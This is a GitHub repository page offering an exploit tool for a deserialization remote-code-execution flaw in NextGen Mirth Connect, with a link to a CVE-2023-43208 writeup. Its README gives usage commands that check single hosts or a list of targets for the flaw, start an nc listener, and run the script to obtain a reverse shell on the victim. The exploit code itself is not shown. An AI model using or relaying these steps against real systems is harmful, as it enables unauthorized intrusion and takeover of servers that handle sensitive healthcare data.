Skip to content

A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.

Notifications You must be signed in to change notification settings

gotr00t0day/NextGen-Mirth-Connect-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

NextGen-Mirth-Connect-Exploit

A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.


INSTALL

clone this repository

cd NextGen-Mirth-Connect-Exploit

pip3 install -r requirements.txt


USAGE

# Check if a target is vulnerable

python3 mirth_connect_exploit.py -t IP -p port

# Check a list of targets in a file

python3 mirth_connect_exploit -f FILE

# Exploit a target to get a reverse shell

nc -lvnp port (to start a listener)

python3 mirthconnect_exploit.py -t IP -p port -lh localhost -lp localport --exploit

Datailed writeup

https://www.horizon3.ai/attack-research/attack-blogs/writeup-for-cve-2023-43208-nextgen-mirth-connect-pre-auth-rce/

About

A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages